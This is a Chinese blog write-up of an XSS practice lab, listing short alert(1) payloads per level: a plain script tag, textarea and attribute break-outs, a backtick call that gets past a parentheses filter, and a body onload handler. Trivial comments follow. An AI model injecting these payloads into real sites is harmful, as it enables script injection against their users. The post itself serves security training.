XSShaozime靶场WP(1)

0x00

基础

<script>alert(1)</script>

0x01

文本注释区,尝试截断前部标签

</textarea><script>alert(1)</script><textarea>

0x02

服务器获取字符串值,尝试截断字符串

"><script>alert(1)</script><"

### 0x02
括号过滤,反引号执行

<script>alert`(1)`</script>

### 0x03
反引号括号过滤

<body onload="alert(1)">

使用 onload事件,加 html编码过滤

onload事件详见

onload 事件 | 菜鸟教程 (runoob.com)

评论

  1. 雪菜
    2 年前
    2024-4-01 20:56:56

    博主真帅

  2. aaa
    已编辑
    2 年前
    2024-6-05 21:02:16

    1

  3. aaa
    2 年前
    2024-9-29 20:00:57

    '">

    • aaa
      aaa
      已编辑
      2 年前
      2024-9-29 20:04:31
      • aaa
        aaa
        已编辑
        2 年前
        2024-9-29 20:07:14
      • 博主
        aaa
        2 年前
        2024-9-29 20:16:49

        • 博主
          DanRan_rie
          已编辑
          2 年前
          2024-9-29 20:21:33

  4. 博主
    2 年前
    2024-9-29 20:17:26

    # 123

  5. 博主
    2 年前
    2024-9-29 20:17:49

    2345

  6. aaa
    已编辑
    2 年前
    2024-9-29 20:23:09
  7. 12345678
    1 年前
    2024-10-31 2:10:18

  8. 666
    1 年前
    2024-12-03 16:44:20

    这什么文章啊 求解

  9. 666
    1 年前
    2024-12-03 16:44:35

    大家都

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
贴吧
颜文字
Emoji
小恐龙
花!
上一篇
下一篇